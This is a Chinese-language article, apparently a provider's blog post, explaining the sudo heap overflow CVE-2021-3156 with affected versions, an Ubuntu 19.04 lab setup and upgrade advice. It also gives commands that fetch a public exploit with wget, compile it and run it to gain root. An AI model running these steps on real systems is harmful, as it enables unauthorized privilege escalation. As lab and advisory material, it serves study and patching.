您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關 Sudo溢出漏洞CVE-2021-3156的示例分析,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
sudo是linux系統管理指令,是允許系統管理員讓普通用戶執行一些或者全部的root命令的一個工具,如halt、reboot、su等等。這樣不僅減少了root用戶的登錄 和管理時間,同樣也提高了安全性。sudo不是對shell的一個代替,它是面向每個命令的。
2021年01月26日,sudo被披露存在一個基于堆的緩沖區溢出漏洞(CVE-2021-3156,該漏洞被命名為“Baron Samedit”),可導致本地權限提升。
當在類Unix的操作系統上執行命令時,非root用戶可以使用sudo命令來以root用戶身份執行命令。由于sudo錯誤地在參數中轉義了反斜杠導致堆緩沖區溢出,從而允許任何本地用戶(無論是否在sudoers文件中)獲得root權限,無需進行身份驗證,且攻擊者不需要知道用戶密碼。
sudo 1.8.2 - 1.8.31p2
sudo 1.9.0 - 1.9.5p1
本次環境使用ubuntu19.04版本
1、官方下載地址:http://old-releases.ubuntu.com/releases/19.04/
2、使用Vmware虛擬機安裝最小安裝即可。(具體安裝過程自行百度)
1、在終端輸入sudo –version查看sudo版本,使用whoami查看當前用戶
2、使用GitHub上的exp進行漏洞利用,使用wget或git進行下載
wget https://hub.fastgit.org/blasty/CVE-2021-3156/archive/main.zip
unzip main.zip
3、進入解壓的目錄,使用make編譯成可執行文件
cd CVE-2021-3156-main/
make
4、執行編譯出來的文件后面加上ubuntu執行可以看到已經是root權限了(使用Debian的系統也可以)
./sudo-hax-me-a-sandwich ubuntu
目前官方已在sudo新版本1.9.5p2中修復了該漏洞,請受影響的用戶盡快升級版本進行防護。
下載地址:https://www.sudo.ws/download.html
以上就是 Sudo溢出漏洞CVE-2021-3156的示例分析,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。